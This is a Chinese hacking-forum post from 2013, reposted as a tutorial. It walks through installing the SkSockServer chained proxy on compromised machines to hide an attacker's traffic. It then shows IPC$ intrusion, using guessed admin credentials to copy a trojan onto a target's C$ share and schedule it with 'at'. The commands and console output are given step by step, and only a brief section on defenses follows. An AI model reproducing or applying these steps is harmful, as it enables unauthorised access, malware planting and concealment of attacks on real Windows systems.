查看: 12301|回复: 1

系统漏洞入侵(下)【转】

[复制链接]
  • TA的每日心情
    奋斗
    2021-9-24 16:00
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2013-1-26 22:26:35 | 显示全部楼层 |阅读模式
    今天要讲的是IPC$漏洞入侵挂马及防御及用对方电脑为自己架跳板。

    用对方计算机架设跳板(这里是COPY的,是snake5架设跳板,我感觉这个写的很详细了,所以就不自己写了):
     snake5的代理跳板,大家应该了解吧? 还是现介绍一下它的特点吧:
    1.与普通的Sock代理程序相比它支持多跳板之间的连续跳, 而它却可支持最多达255个跳板之间的连跳运动,
    2. 普通的Sock代理程序之间的数据传输是不加密的, 而它支持的跳板之间传输的数据是经过动态加密的,
    也就是说每次传输过程中,数据加密的方式都不相同。 就算你不幸在hacking的过程中被webmaster发现,
    普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗,而恰巧你用的是它的话,webmaster将会看到一堆乱码!
    3.普通的sock代理程序在设置上比较烦琐,而它只用两步就行了,普通的sock代理程序要不然只支持Tcp或Udp的连接,很少有二者兼顾的, 而它却全部支持(可以用它上QQ哟!)
    4.普通的sock代理程序都是大胖子,而SSS的体积只有-72K(实在佩服snake的编程能力,能将这样一个sock代理只写了这么小的体积, 可见功底深厚,不愧是高手的作品!)

    还是画个功能示意图吧:

    加密数据 加密数据 普通数据
    []=======[]=======[]=======[]========[]=:::=[]=======[]
    工作站      跳板1            跳板2          跳板3              跳板4          跳板N            目标机

    那么如何在肉机上做snake的代理呢?
    步骤如下:

    1.拷贝Sksockserver.exe到肉鸡目录下了
    在本地copy c:snakeSksockserver.exe #.#.#.#c$


    2.登陆跳板
    c:>telnet #.#.#.#
    Microsoft (R) Windows 2000 (TM) Version 5.00 (Build 2195)
    Welcome to Microsoft Telnet Client
    Telnet Client Build 5.00.99203.1

    Escape Character is 'CTRL+]'

    You are about to send your password information to a remote computer

    in Internet
    zone. This might not be safe. Do you want to send it anyway(y/n):y
    NTLM Authentication failed due to insufficient credentials.
    Please login with
    clear text username and password
    Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
    Welcome to Microsoft Telnet Service
    Telnet Server Build 5.00.99201.1
    login: maomao417
    password: **********
    *==========================================================
    Microsoft Telnet
    *==========================================================
    c:>

    3.在肉鸡上安装Sksockserver程序
    C:>sksockserver.exe <--------先看看帮助文件吧.

    SkServer - is freeware, All Rights Reserved by snake.2001.
    Run with paramater below list:
    -Install (Install the service)
    -Remove (Remove the service)
    -Debug 1813 (Run as console program at port 1813)

    ~ Next are about service registry value setting ~
    -config Show [Port/StartType/Client/SkServer] (Show current config)
    -config Port [NewPort] (Set/Show SkServer's Port)
    -config StartType [1~3] (Set/Show StartType)
    ( 2-Auto, 3-Manual, 4-Disable)
    -config Client [add/del/change] [IP Mask Enable]
    (Show/add/del/change Client Set)
    -config SkServer [add/del/change] [IP Port Enable]
    (Show/add/del/change Pass Skserver Set)


    visit my homepage: [http://snake12.top263.net]
    [http://flushprogram.home.chinaren.com]


    C:>sksockserver -install <--------好,现在开始安装!
    如果你要做连跳,那还么安装后还要做如下设置:
    先看看默认设置情况:
    C:>sksockserver -config show
    SkServer Port = 1080 <----开放服务的端口
    SkServer StartType: 3 - Manual <---服务启动方式
    SkServer Enable Client Set Num:0 <---客户端的项目个数
    SkServer Pass SkServer Number:0 <---经过SkServer的项目个数

    如何设置连跳:
    c:> SkSockServer -config client'ip [add/del] === [显示/增加/删除 客户端的项目]
    c:> SkSockServer -config SkServer'ip [add/del] === [显示/增加/删除
    经过SkServer的项目]

    C:>net start skserver <--------启动服务了!!!!!!!!!!!

    C:>net start <------------------检查是否启动成功!
    These Windows 2000 services are started:

    ......
    Print Spooler
    Server
    Snake SockProxy Service <---------------好的,就是它,开始干了!
    System Event Notification
    TCP/IP NetBIOS Helper Service
    Telephony
    Telnet

    The command completed successfully.

    c:>_

    ^_^现在好了,我也有台自己的代理了,还是可以连跳的,嘿嘿,爽!

    现在来说说IPC$漏洞入侵挂马及防御。
    IPC的意思是internet process connection,翻译成中文是远程网络连接。其中的$意思是共享的意思。
    IPC$的权限很低,但是却很重要,其实IPC$并不能说是一个真正的漏洞,它其实是管理员的一个自带的系统功能,但是黑客们可以通过它而嗅探到更高的权限。之前讲的系统漏洞入侵(上),里面要查找用户和密码,实际上在查找前它就已经获得了IPC$的权限。
    就是你获得了用户名和密码,你的权限还不是最高的,我们要用木马来提权,接下来就来说怎么植入木马及提权(植入什么样的木马就不说了吧,灰鸽子,上兴之类的)。
    架设我扫描到了10.0.0.18的主机,账号为admin,密码为123.接下来打开cmd指令,输入"net use\\10.0.0.18\ipc$/user:admin 123", 按下回车键,先进就建立了一个ipc的连接,要查看是否成功输入"net use"进行查看。
    现在有了管理员的权限,然后输入“copy XXXX.exe\\10.0.0.18\c$\Winnt\”,这个是拷贝代码,我拷贝了我的XXXX病毒到了对方的计算机。
    你还可以指定这个病毒什么时候激活,首先输入“net time\\10.0.0.18”查看对方的时间,架设那台计算机的时间是16点,我要给它17点激活病毒,那么就输入“at\\10.0.0.18 17:00 c:\winnt\XXXX.exe”,至此就完成了IPC漏洞入侵及挂马。

    知道了这个漏洞我们要学会防御。
    1.禁止用户建立虚空连接在一定程度上防御IPC入侵。
    在开始的运行里面,输入regedit,然后确定,打开注册表编辑窗口,然后展开HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Lanmanworkstation>parameters,右击右边窗口的空白处,新建一个DWORD值,将值改为零,确定保存。
    2.关闭共享:首先打开cmd指令,然后输入net share,这个是查看本地共享的资源,然后输入net shareE$/delete,这个是删除E盘的共享资源。
    3.就是设置复杂的管理员密码(这个最简单了,就不详细说明了)。
    回复

    使用道具 举报

    该用户从未签到

    发表于 2013-1-27 11:43:43 | 显示全部楼层
      好文章、、、、、、、谢谢LZ      
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-18 09:51 , Processed in 0.029501 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部